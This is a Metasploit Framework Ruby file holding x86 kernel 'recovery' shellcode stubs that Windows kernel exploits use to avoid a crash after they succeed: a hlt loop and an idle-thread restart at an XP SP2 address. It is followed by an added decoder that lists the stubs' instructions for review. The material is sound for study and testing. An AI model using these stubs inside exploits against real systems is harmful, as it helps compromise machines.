GitHub Repository: rapid7/metasploit-framework
Path: blob/master/lib/rex/payloads/win32/kernel/recovery.rb
# -*- coding: binary -*-
module Rex
module Payloads
module Win32
module Kernel

#
# Recovery stubs are responsible for ensuring that the kernel does not crash.
# They must 'recover' after the exploit has succeeded, either by consuming
# the thread or continuing it on with its normal execution. Recovery stubs
# will often be exploit dependent.
#
module Recovery

  #
  # The default recovery method is to spin the thread
  #
  def self.default(opts = {})
    spin(opts)
  end

  #
  # Infinite 'hlt' loop: 'hlt' followed by 'jmp short -3', which jumps back
  # to the 'hlt', so the thread never returns to the caller.
  #
  def self.spin(opts = {})
    "\xf4\xeb\xfd"
  end

  #
  # Restarts the idle thread by jumping back to the entry point of
  # KiIdleLoop. This requires a hard-coded address of KiIdleLoop.
  # You can pass the 'KiIdleLoopAddress' in the options hash.
  #
  # On 32-bit Windows fs:0 is the KPCR: +0x24 is the current IRQL (2 is
  # DISPATCH_LEVEL, the level KiIdleLoop runs at) and 0xffdff01c is
  # KPCR.SelfPcr, the pointer to the KPCR itself.
  #
  def self.idlethread_restart(opts = {})
    # Default to fully patched XPSP2
    opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil?

    "\x31\xC0" +                                         # xor eax,eax
    "\x64\xC6\x40\x24\x02" +                             # mov byte [fs:eax+0x24],0x2
    "\x8B\x1D\x1C\xF0\xDF\xFF" +                         # mov ebx,[0xffdff01c]
    "\xB8" + [opts['KiIdleLoopAddress']].pack('V') +     # mov eax, KiIdleLoopAddress (0x804dbb27 by default)
    "\x6A\x00" +                                         # push byte +0x0
    "\xFF\xE0"                                           # jmp eax
  end

end

end
end
end
end
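The stubs above are hand-written byte strings whose only documentation is the comment beside each chunk, so a reviewer has no way to tell whether a comment still matches its bytes after an edit. The following decoder is an added example, not part of Rex or Metasploit: it understands just the opcodes and ModRM forms that the two stubs use (hlt, jmp rel8, xor reg,reg, mov byte [fs:reg+disp8],imm8, mov reg,[disp32], mov reg,imm32, push imm8, jmp reg) and turns a stub back into an instruction listing that can be compared against the comments. The module name, the `idlethread_restart` helper that rebuilds the stub with `pack` (so it does not depend on the file's binary encoding magic comment), and the raise-on-anything-unknown policy are all choices made for this example; the bytes and the 0x804dbb27 default are taken from the file.

```ruby
# Minimal x86-32 decoder for the handful of opcodes used by the two recovery
# stubs in Rex::Payloads::Win32::Kernel::Recovery (spin and idlethread_restart).
# Added example, not part of the Rex library: it checks that each stub's bytes
# really encode the instruction written in the comment beside it.
module RecoveryStubDecoder
  REG32 = %w[eax ecx edx ebx esp ebp esi edi].freeze

  # Reads a little-endian 32-bit value from byte array +b+ at +pos+.
  def self.u32(b, pos)
    b[pos, 4].pack('C*').unpack1('V')
  end

  # Decodes +bytes+ (a binary String) into [offset, mnemonic] pairs.
  # Raises on any opcode or ModRM form outside the stubs' small repertoire,
  # so an unexpected byte is reported rather than silently mis-decoded.
  def self.decode(bytes)
    b = bytes.bytes
    out = []
    pc = 0
    while pc < b.length
      start = pc
      seg = ''
      if b[pc] == 0x64 # FS segment-override prefix
        seg = 'fs:'
        pc += 1
      end
      op = b[pc]
      pc += 1
      text = case op
             when 0xF4 then 'hlt'
             when 0xEB # jmp rel8, target relative to the next instruction
               rel = b[pc]; pc += 1
               rel -= 0x100 if rel > 0x7F # sign-extend the displacement
               format('jmp short 0x%x', pc + rel)
             when 0x31 # xor r/m32, r32 (register form only)
               modrm = b[pc]; pc += 1
               raise 'unsupported ModRM for xor' unless (modrm >> 6) == 3
               "xor #{REG32[modrm & 7]},#{REG32[(modrm >> 3) & 7]}"
             when 0xC6 # mov r/m8, imm8 ([reg+disp8] form only)
               modrm = b[pc]; pc += 1
               raise 'unsupported ModRM for mov r/m8' unless (modrm >> 6) == 1 && ((modrm >> 3) & 7) == 0
               disp = b[pc]; pc += 1
               disp -= 0x100 if disp > 0x7F
               imm = b[pc]; pc += 1
               sign = disp < 0 ? '-' : '+'
               format('mov byte [%s%s%s0x%x],0x%x', seg, REG32[modrm & 7], sign, disp.abs, imm)
             when 0x8B # mov r32, r/m32 ([disp32] form only)
               modrm = b[pc]; pc += 1
               raise 'unsupported ModRM for mov r32' unless (modrm >> 6) == 0 && (modrm & 7) == 5
               addr = u32(b, pc); pc += 4
               format('mov %s,[0x%x]', REG32[(modrm >> 3) & 7], addr)
             when 0xB8..0xBF # mov r32, imm32; register is encoded in the opcode
               imm = u32(b, pc); pc += 4
               format('mov %s,0x%x', REG32[op - 0xB8], imm)
             when 0x6A # push imm8
               imm = b[pc]; pc += 1
               format('push byte +0x%x', imm)
             when 0xFF # jmp r/m32 (register form, /4, only)
               modrm = b[pc]; pc += 1
               raise 'unsupported ModRM for jmp' unless (modrm >> 6) == 3 && ((modrm >> 3) & 7) == 4
               "jmp #{REG32[modrm & 7]}"
             else
               raise format('unsupported opcode 0x%02x at offset %d', op, start)
             end
      out << [start, text]
    end
    out
  end

  # The two stubs as they appear in recovery.rb, rebuilt with pack so this
  # example does not depend on the file's binary-encoding magic comment.
  SPIN_STUB = [0xF4, 0xEB, 0xFD].pack('C*')

  # Same bytes as Recovery.idlethread_restart; the default address is the
  # file's XP SP2 KiIdleLoop value.
  def self.idlethread_restart(ki_idle_loop = 0x804dbb27)
    [0x31, 0xC0].pack('C*') +
      [0x64, 0xC6, 0x40, 0x24, 0x02].pack('C*') +
      [0x8B, 0x1D, 0x1C, 0xF0, 0xDF, 0xFF].pack('C*') +
      [0xB8].pack('C') + [ki_idle_loop].pack('V') +
      [0x6A, 0x00].pack('C*') +
      [0xFF, 0xE0].pack('C*')
  end
end

if __FILE__ == $PROGRAM_NAME
  { 'spin' => RecoveryStubDecoder::SPIN_STUB,
    'idlethread_restart' => RecoveryStubDecoder.idlethread_restart }.each do |name, stub|
    puts "#{name}:"
    RecoveryStubDecoder.decode(stub).each { |off, insn| puts format('  %04x  %s', off, insn) }
  end
end
```

Running the file prints both listings; the spin stub decodes to `hlt` followed by `jmp short 0x0`, i.e. a jump back to offset 0, which is what makes it a closed loop. Because the decoder raises on anything it does not recognise, a mistyped byte in a stub fails loudly instead of producing a plausible-looking but wrong listing.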